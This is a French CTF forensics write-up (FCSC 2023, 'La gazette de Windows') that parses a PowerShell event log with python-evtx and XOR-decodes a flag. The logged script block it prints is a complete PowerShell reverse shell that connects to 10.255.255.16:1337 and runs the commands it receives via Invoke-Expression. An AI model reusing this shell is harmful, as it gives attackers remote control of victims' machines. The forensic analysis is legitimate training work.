Solution de U03 pour La gazette de Windows

python3 -m venv ./venv
source venv/bin/activate
python3 -m pip install python-evtx

venv/bin/evtx_dump.py Microsoft-Windows-PowerShell%254Operational.evtx

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>5</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-16 17:18:07.076347"></TimeCreated>
<EventRecordID>1109</EventRecordID>
<Correlation ActivityID="{9b8e9f4f-582a-0001-23ce-8e9b2a58d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="5656" ThreadID="5756"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>DESKTOP-AL3DV8F.fcsc.fr</Computer>
<Security UserID="S-1-5-21-3727796838-1318123174-2233927406-1105"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">do {
    Start-Sleep -Seconds 1
     try{
        $TCPClient = New-Object Net.Sockets.TCPClient('10.255.255.16', 1337)
    } catch {}
} until ($TCPClient.Connected)
$NetworkStream = $TCPClient.GetStream()
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)
function WriteToStream ($String) {
    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}
    $StreamWriter.Write($String + 'SHELL&gt; ')
    $StreamWriter.Flush()
}
$l = 0x46, 0x42, 0x51, 0x40, 0x7F, 0x3C, 0x3E, 0x64, 0x31, 0x31, 0x6E, 0x32, 0x34, 0x68, 0x3B, 0x6E, 0x25, 0x25, 0x24, 0x77, 0x77, 0x73, 0x20, 0x75, 0x29, 0x7C, 0x7B, 0x2D, 0x79, 0x29, 0x29, 0x29, 0x10, 0x13, 0x1B, 0x14, 0x16, 0x40, 0x47, 0x16, 0x4B, 0x4C, 0x13, 0x4A, 0x48, 0x1A, 0x1C, 0x19, 0x2, 0x5, 0x4, 0x7, 0x2, 0x5, 0x2, 0x0, 0xD, 0xA, 0x59, 0xF, 0x5A, 0xA, 0x7, 0x5D, 0x73, 0x20, 0x20, 0x27, 0x77, 0x38, 0x4B, 0x4D
$s = ""
for ($i = 0; $i -lt 72; $i++) {
    $s += [char]([int]$l[$i] -bxor $i)
}
WriteToStream $s
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
    $Output = try {
            Invoke-Expression $Command 2&gt;&amp;1 | Out-String
        } catch {
            $_ | Out-String
        }
    WriteToStream ($Output)
}
$StreamWriter.Close()</Data>
<Data Name="ScriptBlockId">634cf5ca-b06b-4b5a-8354-c5ccd9d3c82a</Data>
<Data Name="Path">C:\Users\jmichel\Downloads\payload.ps1</Data>
</EventData>
</Event>

z = [0x46, 0x42, 0x51, 0x40, 0x7F, 0x3C, 0x3E, 0x64, 0x31, 0x31, 0x6E, 0x32, 0x34, 0x68, 0x3B, 0x6E, 0x25, 0x25, 0x24, 0x77, 0x77, 0x73, 0x20, 0x75, 0x29, 0x7C, 0x7B, 0x2D, 0x79, 0x29, 0x29, 0x29, 0x10, 0x13, 0x1B, 0x14, 0x16, 0x40, 0x47, 0x16, 0x4B, 0x4C, 0x13, 0x4A, 0x48, 0x1A, 0x1C, 0x19, 0x2, 0x5, 0x4, 0x7, 0x2, 0x5, 0x2, 0x0, 0xD, 0xA, 0x59, 0xF, 0x5A, 0xA, 0x7, 0x5D, 0x73, 0x20, 0x20, 0x27, 0x77, 0x38, 0x4B, 0x4D]
i = 0
flag = ''
for c in z:
    flag += chr(c ^ i)
    i += 1

print(flag)

FCSC{xxxxxxxx}

#!/usr/bin/python3

import Evtx.Evtx as evtx
import Evtx.Views as e_views
import re

def main():
    import argparse

    parser = argparse.ArgumentParser(
        description="Dump a binary EVTX file into XML.")
    parser.add_argument("evtx", type=str,
                        help="Path to the Windows EVTX event log file")
    args = parser.parse_args()

    with evtx.Evtx(args.evtx) as log:
        for record in log.records():
            x = record.xml()
    
            if re.search(r'<EventRecordID>1109</EventRecordID>', x):
                print(x)
                m=re.search(r'\$l = (.*)\r', x)
                z = eval('[' + m.group(1) + ']')
                i = 0
                flag = ''
                for c in z:
                    flag += chr(c ^ i)
                    i += 1
                print(flag)

if __name__ == "__main__":
    main()

#!/bin/bash

set -e

if [ ! -f Microsoft-Windows-PowerShell%254Operational.evtx  ]; then
    wget https://hackropole.fr/challenges/fcsc2023-forensics-la-gazette-de-windows/public/Microsoft-Windows-PowerShell%254Operational.evtx -O Microsoft-Windows-PowerShell%254Operational.evtx 
fi

python3 -m venv ./venv
source venv/bin/activate
python3 -m pip install python-evtx

python3 028_La_gazette_de_Windows.py Microsoft-Windows-PowerShell%254Operational.evtx

deactivate

Collecting python-evtx
  Using cached python_evtx-0.7.4-py3-none-any.whl (35 kB)
   .../...
Collecting pyparsing==2.4.7
  Using cached pyparsing-2.4.7-py2.py3-none-any.whl (67 kB)
Using legacy 'setup.py install' for hexdump, since package 'wheel' is not installed.
Installing collected packages: hexdump, six, pyparsing, configparser, more-itertools, zipp, python-evtx
  Running setup.py install for hexdump ... done
Successfully installed configparser-4.0.2 hexdump-3.3 more-itertools-5.0.0 pyparsing-2.4.7 python-evtx-0.7.4 six-1.17.0 zipp-1.0.0

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>5</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-16 17:18:07.076347"></TimeCreated>
<EventRecordID>1109</EventRecordID>
<Correlation ActivityID="{9b8e9f4f-582a-0001-23ce-8e9b2a58d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="5656" ThreadID="5756"></Execution>
    .../...
</EventData>
</Event>

FCSC{xxxxxxxx}